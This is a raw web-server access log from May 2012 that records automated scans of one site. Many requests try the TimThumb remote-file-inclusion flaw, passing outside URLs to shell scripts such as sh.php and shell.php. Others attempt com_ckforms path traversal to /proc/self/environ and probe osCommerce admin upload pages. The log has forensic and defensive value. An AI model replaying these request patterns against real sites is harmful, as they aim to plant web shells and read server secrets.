78.137.37.171 - - [14/May/2012:04:26:45 +0200] "GET /logs/access_log HTTP/1.0" 200 1072647 "http://plaandroid.info/sitemap49.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50"
78.137.37.171 - - [14/May/2012:04:26:45 +0200] "GET /logs/access_log HTTP/1.0" 200 1072846 "http://plaandroid.info/sitemap49.html" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
78.137.37.171 - - [14/May/2012:04:26:46 +0200] "GET /logs/access_log HTTP/1.0" 200 1073090 "http://plaandroid.info/sitemap49.html" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
78.137.37.171 - - [14/May/2012:04:26:46 +0200] "GET /logs/access_log HTTP/1.0" 200 1073275 "http://plaandroid.info/sitemap49.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)"
89.33.197.242 - - [14/May/2012:04:26:52 +0200] "GET /stats//wp-content/themes/Magnificent/tools/timthumb.php?src= HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:26:52 +0200] "GET /stats//wp-content/themes/Magnificent/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:26:52 +0200] "GET /stats//wp-content/themes/Magnificent/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:26:53 +0200] "GET //wp-content/themes/Magnificent/tools/timthumb.php?src= HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:26:53 +0200] "GET //wp-content/themes/Magnificent/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:26:53 +0200] "GET //wp-content/themes/Magnificent/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
112.140.181.76 - - [14/May/2012:04:27:20 +0200] "GET /stats///?option=com_ckforms&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 HTTP/1.1" 200 6313543 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
112.140.181.76 - - [14/May/2012:04:27:53 +0200] "GET ///?option=com_ckforms&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 HTTP/1.1" 200 1056 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.141.35.196 - - [14/May/2012:04:28:01 +0200] "GET /stats//wp-content/themes/Nova/timthumb.php?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 324 "-" "BlackBerry8310/4.5.0.55 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/212"
95.141.35.196 - - [14/May/2012:04:28:03 +0200] "GET //wp-content/themes/Nova/timthumb.php?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 318 "-" "BlackBerry8310/4.5.0.55 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/212"
192.162.102.215 - - [14/May/2012:04:28:38 +0200] "POST /stats/log.keys.html/admin/file_manager.php/login.php?action=processuploads HTTP/1.1" 404 334 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
184.173.6.208 - - [14/May/2012:04:29:58 +0200] "GET /stats//wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:04:29:59 +0200] "GET //wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
46.105.99.98 - - [14/May/2012:04:30:09 +0200] "GET /stats///?option=com_ckforms&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 HTTP/1.1" 200 6313543 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.105.99.98 - - [14/May/2012:04:30:09 +0200] "GET /stats///?option=com_ckforms&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 HTTP/1.1" 200 6313543 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.105.99.98 - - [14/May/2012:04:30:12 +0200] "GET ///?option=com_ckforms&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 HTTP/1.1" 200 1056 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.105.99.98 - - [14/May/2012:04:30:12 +0200] "GET ///?option=com_ckforms&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 HTTP/1.1" 200 1056 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
192.162.102.215 - - [14/May/2012:04:29:08 +0200] "POST /stats/log.keys.html/admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 404 332 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
184.173.6.208 - - [14/May/2012:04:30:20 +0200] "GET /stats//wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:04:30:21 +0200] "GET //wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
109.71.26.49 - - [14/May/2012:04:30:22 +0200] "GET /stats//wp-content/themes/LightBright/timthumb.php?src=http%3A%2F%2Fpicasa.com.friv-juegos.co%2Fapache%2Fevil.php HTTP/1.1" 404 331 "-" "libwww-perl/5.805"
109.71.26.49 - - [14/May/2012:04:30:22 +0200] "GET //wp-content/themes/LightBright/timthumb.php?src=http%3A%2F%2Fpicasa.com.friv-juegos.co%2Fapache%2Fevil.php HTTP/1.1" 404 325 "-" "libwww-perl/5.805"
109.71.26.49 - - [14/May/2012:04:30:23 +0200] "GET /stats//wp-content/themes/LightBright/timthumb.php?src=http://picasa.com.friv-juegos.co/apache/b1.php HTTP/1.1" 404 331 "-" "libwww-perl/5.805"
109.71.26.49 - - [14/May/2012:04:30:23 +0200] "GET //wp-content/themes/LightBright/timthumb.php?src=http://picasa.com.friv-juegos.co/apache/b1.php HTTP/1.1" 404 325 "-" "libwww-perl/5.805"
216.70.71.78 - - [14/May/2012:04:30:47 +0200] "GET /stats//wp-content/themes/Magnificent/tools/timthumb.php?src= HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:30:47 +0200] "GET /stats//wp-content/themes/Magnificent/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:30:47 +0200] "GET /stats//wp-content/themes/Magnificent/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:30:47 +0200] "GET //wp-content/themes/Magnificent/tools/timthumb.php?src= HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:30:47 +0200] "GET //wp-content/themes/Magnificent/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/sh.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
216.70.71.78 - - [14/May/2012:04:30:47 +0200] "GET //wp-content/themes/Magnificent/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
192.162.102.215 - - [14/May/2012:04:30:33 +0200] "POST /stats/log.keys.html/admin/banner_manager.php/login.php?action=insert HTTP/1.1" 404 336 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
78.137.37.171 - - [14/May/2012:04:30:51 +0200] "GET /logs/access_log HTTP/1.0" 200 1080954 "http://plaandroid.info/sitemap56.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.54 [en]"
78.137.37.171 - - [14/May/2012:04:30:52 +0200] "GET /logs/access_log HTTP/1.0" 200 1081154 "http://plaandroid.info/sitemap56.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)"
78.137.37.171 - - [14/May/2012:04:30:53 +0200] "GET /logs/access_log HTTP/1.0" 200 1081334 "http://plaandroid.info/sitemap56.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50"
78.137.37.171 - - [14/May/2012:04:30:53 +0200] "GET /logs/access_log HTTP/1.0" 200 1081533 "http://plaandroid.info/sitemap56.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
78.137.37.171 - - [14/May/2012:04:30:53 +0200] "GET /logs/access_log HTTP/1.0" 200 1081761 "http://plaandroid.info/sitemap56.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)"
192.162.102.215 - - [14/May/2012:04:30:55 +0200] "GET /stats/log.keys.html/images/id_71237.php HTTP/1.1" 404 321 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
46.45.138.202 - - [14/May/2012:04:31:24 +0200] "GET /stats//wp-content/themes/fordreporter/scripts/thumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:04:31:25 +0200] "GET //wp-content/themes/fordreporter/scripts/thumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:04:31:46 +0200] "GET /stats//wp-content/themes/fordreporter/scripts/thumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:31:46 +0200] "GET /stats//wp-content/themes/fordreporter/scripts/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:31:47 +0200] "GET /stats//wp-content/themes/fordreporter/scripts/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:04:31:47 +0200] "GET //wp-content/themes/fordreporter/scripts/thumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:31:47 +0200] "GET /stats//wp-content/themes/fordreporter/scripts/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:31:47 +0200] "GET //wp-content/themes/fordreporter/scripts/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:31:48 +0200] "GET //wp-content/themes/fordreporter/scripts/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:31:48 +0200] "GET //wp-content/themes/fordreporter/scripts/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.132.213.162 - - [14/May/2012:04:32:35 +0200] "GET /logs/access_log HTTP/1.0" 200 1084793 "http://androidenplay.info/sitemap105.html" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]"
95.132.213.162 - - [14/May/2012:04:32:42 +0200] "GET /logs/access_log HTTP/1.0" 200 1084995 "http://androidenplay.info/sitemap105.html" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1)"
121.2.68.215 - - [14/May/2012:04:32:47 +0200] "GET /stats//wp-content/themes/DynamiX/lib/scripts/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.132.213.162 - - [14/May/2012:04:32:48 +0200] "GET /logs/access_log HTTP/1.0" 200 1085462 "http://androidenplay.info/sitemap105.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
121.2.68.215 - - [14/May/2012:04:32:49 +0200] "GET //wp-content/themes/DynamiX/lib/scripts/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.132.213.162 - - [14/May/2012:04:32:49 +0200] "GET /logs/access_log HTTP/1.0" 200 1085462 "http://androidenplay.info/sitemap105.html" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]"
46.45.138.202 - - [14/May/2012:04:32:52 +0200] "GET /stats//wp-content/themes/fordreporter/scripts/thumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.132.213.162 - - [14/May/2012:04:32:52 +0200] "GET /logs/access_log HTTP/1.0" 200 1086393 "http://androidenplay.info/sitemap105.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.2; .NET CLR 1.1.4322; yplus 4.4.02b)"
31.7.34.14 - - [14/May/2012:04:32:53 +0200] "GET /stats//wp-content/themes/fordreporter/scripts/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:04:32:53 +0200] "GET //wp-content/themes/fordreporter/scripts/thumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:32:53 +0200] "GET /stats//wp-content/themes/fordreporter/scripts/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:32:54 +0200] "GET /stats//wp-content/themes/fordreporter/scripts/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:32:54 +0200] "GET //wp-content/themes/fordreporter/scripts/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:32:54 +0200] "GET //wp-content/themes/fordreporter/scripts/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:32:55 +0200] "GET //wp-content/themes/fordreporter/scripts/thumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.173.6.208 - - [14/May/2012:04:32:59 +0200] "GET /stats//wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:04:33:00 +0200] "GET //wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
93.95.221.73 - - [14/May/2012:04:33:03 +0200] "GET /stats/log.keys.html//wp-content/themes/widescreen/includes/timthumb.php?src=http://blogger.com.comuricazione.it/pl.php HTTP/1.1" 404 353 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
93.95.221.73 - - [14/May/2012:04:33:04 +0200] "GET //wp-content/themes/widescreen/includes/timthumb.php?src=http://blogger.com.comuricazione.it/pl.php HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
93.95.221.73 - - [14/May/2012:04:33:05 +0200] "GET /stats//wp-content/themes/widescreen/includes/timthumb.php?src=http://blogger.com.comuricazione.it/pl.php HTTP/1.1" 404 339 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
94.23.195.160 - - [14/May/2012:04:33:12 +0200] "GET /stats//wp-content/themes/widescreen/includes/timthumb.php?src=http://blogger.com.bookoftheweek.org/pl.php HTTP/1.1" 404 339 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
94.23.195.160 - - [14/May/2012:04:33:13 +0200] "GET //wp-content/themes/widescreen/includes/timthumb.php?src=http://blogger.com.bookoftheweek.org/pl.php HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
46.45.138.202 - - [14/May/2012:04:33:16 +0200] "GET /stats/log.keys.html//wp-content/themes/fordreporter/scripts/thumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 351 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.45.138.202 - - [14/May/2012:04:33:17 +0200] "GET //wp-content/themes/fordreporter/scripts/thumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.173.6.208 - - [14/May/2012:04:33:18 +0200] "GET /stats//wp-content/plugins/highlighter/libs/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:04:33:19 +0200] "GET //wp-content/plugins/highlighter/libs/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
46.45.138.202 - - [14/May/2012:04:33:19 +0200] "GET /stats//wp-content/themes/fordreporter/scripts/thumb.php?src=http://flickr.com.bpmohio.com/bad.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:33:24 +0200] "GET /stats//wp-content/themes/Magnificent/tools/timthumb.php?src= HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:33:24 +0200] "GET /stats//wp-content/themes/Magnificent/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:33:24 +0200] "GET /stats//wp-content/themes/Magnificent/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:33:25 +0200] "GET //wp-content/themes/Magnificent/tools/timthumb.php?src= HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:33:25 +0200] "GET //wp-content/themes/Magnificent/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:04:33:25 +0200] "GET //wp-content/themes/Magnificent/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
93.95.221.73 - - [14/May/2012:04:33:33 +0200] "GET /stats//wp-content/themes/widescreen/includes/timthumb.php?src=http://blogger.com.comuricazione.it/pl.php HTTP/1.1" 404 339 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
93.95.221.73 - - [14/May/2012:04:33:35 +0200] "GET //wp-content/themes/widescreen/includes/timthumb.php?src=http://blogger.com.comuricazione.it/pl.php HTTP/1.1" 404 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
199.59.58.162 - - [14/May/2012:04:33:41 +0200] "GET /stats//wp-content/themes/widescreen/includes/timthumb.php?src=http://picasa.com.kiditect.com/pl.php HTTP/1.1" 404 339 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
199.59.58.162 - - [14/May/2012:04:33:42 +0200] "GET //wp-content/themes/widescreen/includes/timthumb.php?src=http://picasa.com.kiditect.com/pl.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
46.105.99.98 - - [14/May/2012:04:33:41 +0200] "GET /stats///?option=com_ckforms&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 HTTP/1.1" 200 6313543 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.105.99.98 - - [14/May/2012:04:33:53 +0200] "GET ///?option=com_ckforms&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 HTTP/1.1" 200 1056 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.105.99.98 - - [14/May/2012:04:33:42 +0200] "GET /stats///?option=com_ckforms&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 HTTP/1.1" 200 6313543 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
46.105.99.98 - - [14/May/2012:04:33:54 +0200] "GET ///?option=com_ckforms&controller=..//..//..//..//..//..//..//..///proc/self/environ%0000 HTTP/1.1" 200 1056 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:34:29 +0200] "GET /stats//wp-content/themes/flix/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:34:29 +0200] "GET /stats//wp-content/themes/flix/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:34:30 +0200] "GET /stats//wp-content/themes/flix/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:34:30 +0200] "GET //wp-content/themes/flix/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/jb.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:34:30 +0200] "GET //wp-content/themes/flix/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/sh.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
31.7.34.14 - - [14/May/2012:04:34:31 +0200] "GET //wp-content/themes/flix/timthumb.php?src=http://blogger.com.avisameinmobiliarias.es/xx.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
95.167.173.166 - - [14/May/2012:04:34:33 +0200] "GET //wp-content/themes/coda//timthumb.php?src=http://blogger.com.el-manhal.com/mods/sh.php HTTP/1.1" 404 319 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
